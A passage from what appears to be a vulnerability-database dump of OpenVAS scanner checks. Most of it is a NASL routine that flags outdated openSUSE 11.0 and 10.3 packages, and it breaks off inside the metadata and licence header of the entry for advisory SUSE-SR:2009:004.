rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"qt4-x11-tools\", rpm:\"qt4-x11-tools~4.4.0~12.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"satsolver-tools\", rpm:\"satsolver-tools~0.9.6~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sbl\", rpm:\"sbl~3.2.2~16.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sbl-orca\", rpm:\"sbl-orca~3.2.2~16.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sblim-sfcb\", rpm:\"sblim-sfcb~1.3.0~6.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"swfdec\", rpm:\"swfdec~0.6.8~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"swfdec-devel\", rpm:\"swfdec-devel~0.6.8~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"swfdec-doc\", rpm:\"swfdec-doc~0.6.8~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tiff\", rpm:\"tiff~3.8.2~108.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd\", rpm:\"ulogd~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-mysql\", rpm:\"ulogd-mysql~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pcap\", rpm:\"ulogd-pcap~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pgsql\", rpm:\"ulogd-pgsql~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-sqlite\", rpm:\"ulogd-sqlite~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-ose\", rpm:\"virtualbox-ose~1.5.6~33.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-ose-guest-tools\", rpm:\"virtualbox-ose-guest-tools~1.5.6~33.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wine\", rpm:\"wine~0.9.64_aka_1.0.rc3~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wine-devel\", rpm:\"wine-devel~0.9.64_aka_1.0.rc3~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-devel\", rpm:\"xine-devel~1.1.12~8.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-extra\", rpm:\"xine-extra~1.1.12~8.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-lib\", rpm:\"xine-lib~1.1.12~8.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-virtualbox-ose\", rpm:\"xorg-x11-driver-virtualbox-ose~1.5.6~33.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-gtk\", rpm:\"yast2-gtk~2.16.15~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-ncurses-pkg\", rpm:\"yast2-ncurses-pkg~2.16.14~0.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-packager\", rpm:\"yast2-packager~2.16.53~3.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-pkg-bindings\", rpm:\"yast2-pkg-bindings~2.16.42~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-qt-pkg\", rpm:\"yast2-qt-pkg~2.16.48~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audacity\", rpm:\"audacity~1.3.3~46.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.6~24.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~24.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~24.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~24.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~24.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dovecot\", rpm:\"dovecot~1.0.5~6.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dovecot-devel\", rpm:\"dovecot-devel~1.0.5~6.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-debuginfo\", rpm:\"java-1_6_0-sun-debuginfo~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-demo\", rpm:\"java-1_6_0-sun-demo~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-src\", rpm:\"java-1_6_0-sun-src~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipulog\", rpm:\"libipulog~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff-devel\", rpm:\"libtiff-devel~3.8.2~68.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff3\", rpm:\"libtiff3~3.8.2~68.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt\", rpm:\"libvirt~0.3.0~30.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-devel\", rpm:\"libvirt-devel~0.3.0~30.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-doc\", rpm:\"libvirt-doc~0.3.0~30.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-python\", rpm:\"libvirt-python~0.3.0~30.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.6.30~4.11\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.6.30~4.11\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.10.0~32.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk\", rpm:\"netatalk~2.0.3~130.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk-devel\", rpm:\"netatalk-devel~2.0.3~130.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"novell-ipsec-tools\", rpm:\"novell-ipsec-tools~0.6.3~114.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"novell-ipsec-tools-devel\", rpm:\"novell-ipsec-tools-devel~0.6.3~114.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.0~96.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-devel\", rpm:\"openslp-devel~1.2.0~96.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-server\", rpm:\"openslp-server~1.2.0~96.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mhash\", rpm:\"php5-mhash~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sbl\", rpm:\"sbl~3.0f~16.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tiff\", rpm:\"tiff~3.8.2~68.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd\", rpm:\"ulogd~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-mysql\", rpm:\"ulogd-mysql~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pcap\", rpm:\"ulogd-pcap~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pgsql\", rpm:\"ulogd-pgsql~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-sqlite\", rpm:\"ulogd-sqlite~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~1.5.2~10.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~1.5.2~10.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-devel\", rpm:\"xine-devel~1.1.8~14.11\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-extra\", rpm:\"xine-extra~1.1.8~14.11\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-lib\", rpm:\"xine-lib~1.1.8~14.11\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-virtualbox\", rpm:\"xorg-x11-driver-virtualbox~1.5.2~10.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:23", "description": "The remote host is missing updates announced in\nadvisory SUSE-SR:2009:004. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.", "cvss3": {}, "published": "2009-02-18T00:00:00", "type": "openvas", "title": "SuSE Security Summary SUSE-SR:2009:004", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-3652", "CVE-2008-5248", "CVE-2007-5342", "CVE-2008-5244", "CVE-2008-5239", "CVE-2008-3231", "CVE-2008-5302", "CVE-2008-5238", "CVE-2008-3796", "CVE-2008-5252", "CVE-2008-5245", "CVE-2009-0416", "CVE-2007-5333", "CVE-2008-3663", "CVE-2008-5240", "CVE-2008-5235", "CVE-2008-5236", "CVE-2008-5250", "CVE-2007-3382", "CVE-2008-5587", "CVE-2008-5086", "CVE-2008-5241", "CVE-2009-0030", "CVE-2007-0184", "CVE-2007-0185", "CVE-2008-5237", "CVE-2008-1947", "CVE-2007-2450", "CVE-2007-2449", "CVE-2008-5658", "CVE-2008-5243", "CVE-2009-0310", "CVE-2007-5613", "CVE-2008-5233", "CVE-2008-5718", "CVE-2007-3386", "CVE-2009-0490", "CVE-2008-5246", "CVE-2008-2938", "CVE-2008-1586", "CVE-2007-5461", "CVE-2009-0313", "CVE-2008-3651", "CVE-2008-5247", "CVE-2007-6286", "CVE-2008-4577", "CVE-2008-2370", "CVE-2008-5242", "CVE-2008-5557", "CVE-2007-2377", "CVE-2007-3385", "CVE-2008-2235", "CVE-2008-1232", "CVE-2008-5234", "CVE-2007-5615", "CVE-2006-3835", "CVE-2008-5256", "CVE-2008-0002"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:63412", "href": "http://plugins.openvas.org/nasl.php?oid=63412", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sr_2009_004.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SR:2009:004\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 